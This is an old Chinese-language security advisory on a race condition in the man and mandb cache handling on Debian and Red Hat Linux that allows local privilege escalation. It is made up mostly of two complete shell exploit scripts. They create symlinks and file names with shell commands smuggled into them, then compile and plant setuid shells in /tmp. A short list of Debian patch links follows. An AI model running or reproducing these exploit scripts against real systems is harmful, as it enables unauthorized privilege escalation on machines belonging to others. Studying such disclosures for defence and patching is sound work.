Linux Man 恶意cache文件可建立漏洞发布时间:2001-06-13 更新时间:2001-06-13 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 Debian Linux 2.3详细描述 存在本地用户使man缓存预设好的man搜索路径以外的文件到系统缓存目录的可能, 组合'man'和'mandb'或者其他可以信任cache文件名的程序,可以用这个漏洞来 提高权利。 测试代码 #!/bin/sh ################################################### # Fri May 18 22:08:42 JAVT 2001 # # ----------------------------------------------- # # man MANPATH symlink redirection bugs # # proof of concept. # # version affected: # # <= man-1.5h1-20 # # # # tested on: # # redhat7.1 -> any user suidshell # # # # by jenggo <luki@karet.org> # # # # thanx to: echo, mayonaise all @ #karet # ################################################### # hmmm ... ada yang bisa modif jadi instant root ?? :P # IMPORTANT ! # set this to command that has no man page DEADLY_BIN="netconf" # on <= redhat6.2 could be /var/cache/catman CACHEDIR="/var/cache/man" CACHEDIR2="/var/cache/catman" GZ="/bin/gzip" echo -n "check man dir ..." if [ ! -d $CACHEDIR ]; then if [ -d $CACHEDIR2 ]; then CACHEDIR=$CACHEDIR2 echo "OK" else echo "FAILED" echo "check your man dir" exit fi else echo "OK" fi echo -n "checking sgid/suid man ..." if [ ! -g /usr/bin/man ]; then # is it a debian man? if [ -d /usr/lib/man-db ]; then echo "FAILED" echo "I think this is debian style man, use other script" else echo "FAILED" echo "can't find executables sgid man binary" fi exit else echo "OK" fi echo "making our man directory ..." echo mkdir -p /tmp/man/man1 mkdir /tmp/cat1 mkdir /tmp/mine chmod 777 /tmp/mine echo "creating our man page ..." echo echo "BEBAS EUY"|$GZ -c > /tmp/man/man1/huhuy.1.gz echo "creating symlink ..." echo ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz echo "creating our bogus command ..." echo touch /tmp/huhuy echo "making manx shellscript" echo /bin/cat > /tmp/mine/manx <<EOF #!/bin/sh export PATH="/bin:/usr/bin:/sbin:/usr/sbin" VICTIM=\`/usr/bin/id -u\` /bin/cat >/tmp/mine/my"\$VICTIM".c <<EOG #include <stdio.h> void main() { char *hh[2]={"/bin/sh", NULL}; setreuid(\$VICTIM,\$VICTIM); execve(hh[0], hh, NULL); } EOG /usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null /bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null EOF chmod 755 /tmp/mine/manx if [ ! -x /tmp/mine/manx ]; then echo "file: /tmp/mine/manx can't be set executable !" echo "fix the exploit first" echo "cleaning up ..." /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy exit fi echo "prepare to exploit ..." echo export PATH=../../../../../../tmp cd / echo "exploiting ..." echo /usr/bin/man -d huhuy 2>/dev/null export PATH=/bin:/usr/bin echo "checking our exploit result" echo if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then echo "content of $CACHEDIR/cat1:" ls -l $CACHEDIR/cat1 echo echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'" echo "and your suidshells will be waiting at /tmp/mine/* :)" echo "bye." echo "[-------- jenggo <luki@karet.org> --------]" echo else echo "hrrmm ... exploit failed to create offending file !" echo "check again please" echo "cleaning up ..." /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy fi --------------------------------------------------------------- #!/bin/sh ################################################### # Fri Jun 1 23:00:10 JAVT 2001 # # ----------------------------------------------- # # man MANPATH symlink redirection bugs # # proof of concept. # # version affected: # # <= man-db 2.3.16-3,2.3.17-3.2 # # # # tested on: # # debian2.2 -> instant man suidshell # # # # by jenggo <luki@karet.org> # # # # thanx to: echo, mayonaise all @ #karet # # ==> Mr.dur,amien,mega,akbar ... damai,damai ;) # ################################################### TMPDIR=/tmp/mywork RAND=`/bin/date +%S` echo "making working dir ..." /bin/mkdir -p $TMPDIR/man/man1 /bin/chmod 777 $TMPDIR /bin/chmod 777 $TMPDIR/man echo "copying needed files ..." if [ ! -x /usr/bin/groff ] || [ ! -x /usr/bin/grotty ] || [ ! -x /usr/bin/troff ] || [ ! -x /usr/bin/gcc ]; then echo "Failed, I need executable : groff,grotty,troff,gcc" echo "cleaning up ..." /bin/rm -rf $TMPDIR fi /bin/cp /usr/bin/groff $TMPDIR /bin/cp /usr/bin/grotty $TMPDIR /bin/cp /usr/bin/troff $TMPDIR echo "compiling helper ..." /bin/cat > $TMPDIR/hehe.c <<EOF #include <stdio.h> int main() { char *aa[2]={"/bin/sh", NULL}; setreuid(6,6); execve(aa[0], aa, NULL); exit(0); } EOF /usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null /bin/cat > $TMPDIR/mandeb.c <<EOF #include <stdio.h> int main() { seteuid(6); setuid(6); system("/bin/cp /tmp/mywork/hehe /tmp/huhu"); system("/bin/chown man /tmp/huhu"); system("/bin/chmod 4755 /tmp/huhu"); exit(0); } EOF /usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null 1>/dev/null echo "making our manpage ..." /bin/ln -s /var/cache/man/cat1 $TMPDIR/man/cat1 /bin/echo "bebas euy"|/bin/gzip -c > $TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz" /bin/touch $TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" export PATH=$TMPDIR /usr/bin/man "cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null echo "/bin/ls -la /var/cache/man/cat1" /bin/ls -la /var/cache/man/cat1 export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin echo "exploiting ..." /bin/rm -f /tmp/huhu /usr/lib/man-db/mandb 2>/dev/null 1>/dev/null /bin/rm -rf /tmp/mywork echo echo "/bin/ls -la /tmp" /bin/ls -la /tmp if [ -u /tmp/huhu ]; then echo "file /tmp/huhu is setuid. Hope it's owned by man" echo "Have a nice day" echo "[----- jenggo <luki@karet.org> -----]" /tmp/huhu else echo "exploit failed, cleaning up our binary ..." fi echo "cleaning up our preparation step dir ..." /bin/rm -rf /tmp/$TMPDIR 解决方案 下载补丁: Debian Linux 2.2: Debian upgrade 2.2 alpha man-db_2.3.16-4_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/man-db_2.3.16-4_alpha.deb Debian upgrade 2.2 arm man-db_2.3.16-4_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/man-db_2.3.16-4_arm.deb Debian upgrade 2.2 i386 man-db_2.3.16-4_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/man-db_2.3.16-4_i386.deb Debian upgrade 2.2 m68k man-db_2.3.16-4_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/man-db_2.3.16-4_m68k.deb Debian upgrade 2.2 ppc man-db_2.3.16-4_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/man-db_2.3.16-4_powerpc.deb Debian upgrade 2.2 sparc man-db_2.3.16-4_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/man-db_2.3.16-4_sparc.deb 相关信息 |
